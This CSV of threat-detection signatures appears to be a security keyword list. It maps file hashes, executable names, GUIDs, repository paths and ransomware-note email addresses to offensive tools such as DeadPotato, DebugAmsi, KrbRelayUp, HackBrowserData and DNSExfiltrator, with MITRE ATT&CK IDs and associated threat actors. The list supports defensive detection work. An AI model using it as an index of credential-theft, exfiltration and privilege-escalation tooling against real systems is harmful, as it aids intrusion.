"*de644386f998ffc10be5abafb2d6fc00ea44932ae1d85e353a36faf77892e967*",".{0,1000}de644386f998ffc10be5abafb2d6fc00ea44932ae1d85e353a36faf77892e967.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40517"
"*de6ab219ec55af3fa4cb74c1342e3c22f1dccd8d465df96110511fc426109372*",".{0,1000}de6ab219ec55af3fa4cb74c1342e3c22f1dccd8d465df96110511fc426109372.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40518"
"*de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc*",".{0,1000}de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40519"
"*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*",".{0,1000}DE7B9E6B\-F73B\-4573\-A4C7\-D314B528CFCB.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40521"
"*de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e*",".{0,1000}de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40523"
"*de91f6c22eb6c8cc6da344665a046253392151bab78bf27196fec5d6d3f55b29*",".{0,1000}de91f6c22eb6c8cc6da344665a046253392151bab78bf27196fec5d6d3f55b29.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","40524"
"*de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab*",".{0,1000}de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40525"
"*dea9d52d974dbe0c3598b7f75f07f6e1ef6eb835195938188942f49f9034a432*",".{0,1000}dea9d52d974dbe0c3598b7f75f07f6e1ef6eb835195938188942f49f9034a432.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","40529"
"*deadpotato.exe*",".{0,1000}deadpotato\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","40530"
"*DeadPotato-NET4.exe*",".{0,1000}DeadPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","40531"
"*Deanlivermore@protonmail.com*",".{0,1000}Deanlivermore\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40532"
"*deb http://old.kali.org/kali sana main non-free contrib*",".{0,1000}deb\shttp\:\/\/old\.kali\.org\/kali\ssana\smain\snon\-free\scontrib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","40533"
"*deb.torproject.org/torproject.org/*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40534"
"*deb.torproject.org/torproject.org/*.asc*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}\.asc.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40535"
"*deb.torproject.org-keyring*",".{0,1000}deb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40536"
"*debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98*",".{0,1000}debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40538"
"*debf430fa413aa09fcb067ba67e7a9813dc06b5f16ab32fab9686bee1f5639da*",".{0,1000}debf430fa413aa09fcb067ba67e7a9813dc06b5f16ab32fab9686bee1f5639da.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40540"
"*debian.org/pkg-security-team/creddump7*",".{0,1000}debian\.org\/pkg\-security\-team\/creddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","40541"
"*debian-tor:x*",".{0,1000}debian\-tor\:x.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40542"
"*DebugAmsi.exe*",".{0,1000}DebugAmsi\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40543"
"*DebugAmsi.sln*",".{0,1000}DebugAmsi\.sln.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40544"
"*DebugAmsi.vcxproj*",".{0,1000}DebugAmsi\.vcxproj.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40545"
"*DebugAmsi-main*",".{0,1000}DebugAmsi\-main.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40546"
"*DebugAmsix64.exe*",".{0,1000}DebugAmsix64\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40547"
"*DebugAmsix86.exe*",".{0,1000}DebugAmsix86\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40548"
"*DebugInjectionVariant.exe*",".{0,1000}DebugInjectionVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40550"
"*DEBUG-preobfuscation.vba*",".{0,1000}DEBUG\-preobfuscation\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","40551"
"*DebugUpdateProcVariant.exe*",".{0,1000}DebugUpdateProcVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40552"
"*Dec0ne/KrbRelayUp*",".{0,1000}Dec0ne\/KrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","40553"
"*Dec0ne/ShadowSpray*",".{0,1000}Dec0ne\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","40554"
"*dec2d084da34a9d29f17ccbd9b7a3820e3c7e9bd903049054f3f115f33cf5f5e*",".{0,1000}dec2d084da34a9d29f17ccbd9b7a3820e3c7e9bd903049054f3f115f33cf5f5e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40555"
"*dec37f1ac505d447bb5d7b4c2bb61d438097b13c28263ffb4209ce41884784b6*",".{0,1000}dec37f1ac505d447bb5d7b4c2bb61d438097b13c28263ffb4209ce41884784b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40556"
"*dec494b5bf9db4a84423b921a2137eafc02f4a9839db0e7b0e6900826766ed92*",".{0,1000}dec494b5bf9db4a84423b921a2137eafc02f4a9839db0e7b0e6900826766ed92.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40557"
"*dec6b9f665b6679c1c9bedbd9d51ea9faf76f29619b7cc4892f22b9659719335*",".{0,1000}dec6b9f665b6679c1c9bedbd9d51ea9faf76f29619b7cc4892f22b9659719335.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","40560"
"*dec809566b81f6e41ea9fd5643c852371555e7477e406b2d7052317313d1b3e2*",".{0,1000}dec809566b81f6e41ea9fd5643c852371555e7477e406b2d7052317313d1b3e2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40561"
"*dec9c3346c770a93bd7f1fb1b891100d806ecc70f1c5da84ea001aa0efb3694d*",".{0,1000}dec9c3346c770a93bd7f1fb1b891100d806ecc70f1c5da84ea001aa0efb3694d.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","40562"
"*dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b*",".{0,1000}dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","40563"
"*deced84e656eb8ae4d4c57dfea5d0a74b558f5975621a9ae0d25d59d3c550f4f*",".{0,1000}deced84e656eb8ae4d4c57dfea5d0a74b558f5975621a9ae0d25d59d3c550f4f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40564"
"*Decfile@cyberfear.com*",".{0,1000}Decfile\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40565"
"*DecFile@tutanota.com*",".{0,1000}DecFile\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40566"
"*decipher_mremoteng.jar*",".{0,1000}decipher_mremoteng\.jar.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","40567"
"*deckard@tyrellcorporation.io*",".{0,1000}deckard\@tyrellcorporation\.io.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#email","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","40568"
"*decoded_lsass.dmp*",".{0,1000}decoded_lsass\.dmp.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","40569"
"*DecodeRDPCache.ps1*",".{0,1000}DecodeRDPCache\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40570"
"*decoder-it/ADCSCoercePotato*",".{0,1000}decoder\-it\/ADCSCoercePotato.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","40571"
"*decoder-it/KrbRelay-SMBServer*",".{0,1000}decoder\-it\/KrbRelay\-SMBServer.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","40572"
"*decoder-it/LocalPotato*",".{0,1000}decoder\-it\/LocalPotato.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","40573"
"*decoder-it/psgetsystem*",".{0,1000}decoder\-it\/psgetsystem.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","40574"
"*decoder-it/TokenStealer*",".{0,1000}decoder\-it\/TokenStealer.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","40575"
"*Decode-RoutingPacket*",".{0,1000}Decode\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40576"
"*decoy_document.xls*",".{0,1000}decoy_document\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","40577"
"*decrypt.py .\*.txt utf-16-le*",".{0,1000}decrypt\.py\s\.\\.{0,1000}\.txt\sutf\-16\-le.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","40578"
"*decrypt_chrome_password(*",".{0,1000}decrypt_chrome_password\(.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","40579"
"*decrypt_chrome_password.py*",".{0,1000}decrypt_chrome_password\.py.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","40580"
